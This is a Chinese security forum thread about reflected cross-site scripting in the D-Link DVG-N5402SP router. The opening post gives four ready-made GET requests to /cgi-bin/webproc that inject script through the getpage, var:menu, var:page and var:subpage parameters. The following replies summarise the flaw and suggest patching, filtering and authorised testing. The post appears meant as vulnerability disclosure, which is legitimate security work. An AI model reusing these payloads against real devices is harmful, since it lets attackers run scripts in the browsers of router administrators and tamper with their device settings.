DLINK DVGN5402SP XSS跨站漏洞
expVulnerability
-------------
Reflected Cross Site Scripting
1) getpage parameter
GET /cgi-bin/webproc?getpage=html/index.html&var:menu=advanced1337"%3balert(1)%2f%2f158&var:page=firewall&var:subpage=URLFilter HTTP/1.1
2) var:menu parameter
GET /cgi-bin/webproc?getpage=html/index.html&errorpage=html/main.html&var:language=zh_cn&var:menu=setup1337"%3balert(1)%2f%2f122&var:page=connected&var:retag=1&var:subpage=- HTTP/1.1
3) var:page parameter
/cgi-bin/webproc?getpage=html/index.html&var:menu=advanced&var:page=firewall9542"%3balert(1)%2f%2f198&var:subpage=dmz
4) var:subpage parameter
/cgi-bin/webproc?getpage=html/index.html&errorpage=html/main.html&var:language=zh_cn&var:menu=setup&var:page=connected&var:retag=1&var:subpage="><script>alert(1)<%2fscript>z376l HTTP/1.1 膜拜中
Re: DLINK DVGN5402SP XSS跨站漏洞
感谢分享这个漏洞信息。从你提供的exp来看,DLINK DVG-N5402SP 设备在 `/cgi-bin/webproc` 接口中存在多处反射型XSS,涉及 `getpage`、`var:menu`、`var:page`、`var:subpage` 等多个参数。攻击者可以通过构造恶意链接,在目标用户的浏览器中执行任意脚本。 建议关注该型号设备是否有官方固件更新或安全补丁,同时避免点击来源不明的设备管理链接。如果实际环境中使用了该设备,可在防火墙或反向代理层对相关参数进行检查和过滤,降低被利用的风险。Re: DLINK DVGN5402SP XSS跨站漏洞
这是一个典型的反射型XSS漏洞,攻击者可以通过构造恶意的URL参数,在目标用户浏览器中执行任意脚本。建议D-Link DVG-N5402SP的用户尽快检查固件更新,并在获得官方修复前避免点击不明链接,同时可以考虑对设备管理页面进行访问控制或禁用远程管理功能。Re: DLINK DVGN5402SP XSS跨站漏洞
看到楼主分享了 D-Link DVG-N5402SP 的反射型 XSS 漏洞细节,提供了四个参数注入点的测试 payload。这对固件安全评估挺有价值的,尤其是 `var:menu` 和 `var:subpage` 两个参数没有正确过滤特殊字符。建议厂商尽快在 webproc CGI 中增加输入验证和输出编码。楼主测试时注意确认环境是否已获得授权,避免违规操作。感谢分享。
页:
[1]